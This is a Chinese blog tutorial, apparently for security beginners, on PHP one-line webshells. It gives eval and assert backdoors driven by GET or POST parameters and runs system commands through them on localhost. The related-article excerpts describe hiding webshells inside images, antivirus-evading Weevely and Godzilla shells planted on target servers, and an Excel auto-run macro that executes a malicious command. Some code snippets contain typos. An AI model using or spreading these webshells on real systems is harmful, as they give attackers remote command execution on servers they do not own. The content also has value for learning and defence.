一句话木马

最新推荐文章于 2022-08-06 17:11:20 发布
最新推荐文章于 2022-08-06 17:11:20 发布
阅读量509 收藏 1
点赞数 2
文章标签: p2p 网络协议 网络 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YUGUOHOU/article/details/121703315
版权

1.Get

第一步:先创建一个get.php文档

第二步:用notepad++打开,编辑,输入代码

header('Content-Type:text/html;charset=gbk');     因为浏览器不同,有可能出现乱码,输入这个命

令,可以避免这个问题

<?php @eval($_GET['cmd']);?>

 第三步:用浏览器打开,就可以查看我们的信息

 2.post

post步骤和get基本相同

第一步:新建一个post文档

第二步:用notepad++打开,编辑,输入代码

header('Content-Type:text/html;charset=gbk');  

<?php @eval($_POST[‘cmd’]);?>

        第三步:用浏览器打开,点击F12,找到HackBar,(注意这个HackBar是一个浏览器的插件,

需要我们使用火狐浏览器,在扩张里面搜这个插件,点击安装即可)

这里是安装好的样子

 输入代码

http://127.0.0.1/post.php

 点击下方Past data,输入cmd=system(‘ipconfig’);

 最后点击execute即可

 3.assert

第一步:创建assert文档

第二步:用notepad++打开,编辑,输入代码

<?php  @assert($_POST[‘cmd’])

第三步:打开浏览器,点击F12,输入

Cmd=system(‘ipconfig’);

 4.GET文件包含

第一步:创建一个新的2.php文档

第二步:在新建的2.php中输入

<?php phpinfo();?>

 第三步:在我们一开始的get代码中,加上一条include  “2.php”;

 第三步:用浏览器打开即可

 5.post文件包含

第一步:因为我们已经创建过新的文档(2.php),在post.php的基础上,输入

     <?php include “2.php”;

  @eval ($_POST[‘cmd’];)

?>

 

第二步:和get相同用浏览器打开,点击F12,找到HackBar,输入代码

http://127.0.0.1/post.php

点击下方Past data,输入cmd=system(‘ipconfig’);

YUGUOHOU
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
使用Weevely工具上传一句话木马
一颗小松子.的博客
01-27 3097
Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。
一句话木马全攻略
天马行空
05-21 1690
大家都知道入侵网站拿Webshell的时候一般思路有备份和上传小马然后写大马。然后比较多的就是用一句话来拿Webshell.但是对于新手。如何正确使用一句话呢?这就是本问讲到的,请大家看下文---------------------------------------------------------------------------------------------------
一句话木马(godzilla)
weixin_59872639的博客
11-26 1586
下载godzilla 链接:https://pan.baidu.com/s/1zqZ_1I-oqFY4HvJiAJzqgw 提取码:vwlc 需要java环境 新建一个php文件 使用java打开godzilla 生成后导入新建的php文件中 将此文档导入目标服务器的 /var/www/html 打开网页后显示页面空白即为木马导入成功 ...
一句话木马、中国菜刀、图片一句话制作、过狗一句话
热门推荐
weixin_44722125的博客
04-18 2万+
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
如何制作图片一句话木马
qq_52676257的博客
03-09 2980
如何制作图片一句话木马 新建一个文件夹,在其中放入一张图片(图片后缀名只要是图片的那几个后缀名即可)和一句话木马,例如: 其中的一句话木马为 <?php @eval($_POST["value"]);?> 再写入一个cmd的bat文件 然后打开bat文件 并输入copy tp.jpg/b+yjh.php shell.jpg 这样就会在先前所建的文件夹里,得到了一张新的图片,我命名为了shell.jpg,这时我们就得到了所需要的图片一句话木马。 ...
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
每日一题--一句话木马的利用
qq_45655136的博客
07-12 249
用d盾扫描后,发现存在后门,打开.config.php文件 、、、 <?php if (@$_SERVER['HTTP_USER_AGENT'] == 'flag'){ eval($_POST[1]); } ?> 、、、 发现这个就是对一句话木马的报头有一个User-Agent限制,改成flag,然后用蚁剑连接就可以了,密码为1 ...
一句话密码生成器
haungrui的专栏,水底深呼吸
12-23 404
生成16位含大小写字母、数字、符号的密码 , 没有相应字段也别纠结啊^_^多运行几次就行了 ''.join( [random.choice( string.ascii_letters + string.digits + string.punctuation ) for i in range(16)] )
图片一句话制作教程_php一句话木马图片制作-2019php、asp通用
weixin_30556959的博客
01-19 656
图片一句话制作教程 准备工具:   c32(反汇编工具)   一张完好的图片 第一:打开c32工具 第二:将图片拖到工具打开,选择16进制打开 第三:找一句话在图片的末尾处粘贴(红框处粘贴),然后保存即可。 注意:通用的就是同时加asp、php的一句话即可。(此文章仅供技术交流!!!) 转载于:https://www.cnblogs.com/secsaf...
python+php一句话木马的利用
CYLK1987310466的博客
07-29 1338
python知识点,php一句话木马
抓包分析php一句话木马
LainWith的博客
08-27 3048
在回答一句话木马是怎么玩的之前,先从最简单的_GET开始 _GET(PHP数组) _GET是一个数组 _GET的作用域是超全局,不需在脚本内部定义或初始化,即可使用 接收从浏览器客户端GET方式(URL中)传递到服务器的参数 GET传参的参数名做_GET数组的key,参数值做为数组的value GET传参时,直接将参数拼接到URL中即可 举个例子来说明_GET是怎么玩的 <pre> #标准化输出 <?php $name="alice"; #初始化一个变量 echo "Your nam
6.PHP函数、$GET和$POST变量
小阿宁的猫猫
08-06 528
1.PHP函数 (1) 创建函数: (2) 添加参数 (3) 返回值: 2.$_GET变量 3.$_POST变量 4.演示代码
PHP一句话木马
weixin_64338385的博客
12-03 1071
Get、 Post、Assert 首先在www目录下创建出对应文件 以 .php为后缀名 Get输入 <?php @eval($_GET([‘cmd’]?); //eval把字符串作为PHP代码执行 ?> 保存之后在网页访问 127.0.0.1/get.php?cmd=system(‘ipconfig’); 输入whoami,访问用户名 Post <?php @eval($_POST[‘cmd’]); ?> Post ...
PHP文件包含与一句话木马实验代码
a2788656708的博客
12-03 2761
文件包含 1.新建phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
PHP编程基础03---get&post 一句话木马
Z_l123的博客
12-03 2935
准备 1.下载火狐浏览器 2.安装HackBar插件 GitHub - HCTYMFF/hackbar2.1.3 下载后拖入即可 3.选择HackBar 4.关闭自动更新 get 1.编写一句话木马 <?php @eval($_GET['cmd']); ?> 2.用本机ip访问木马文件并查询ipconfig 3.若查询结果出现乱码 则在php中添加 header('Content-Type:text/html;charset=gbk'); ...
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YUGUOHOU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值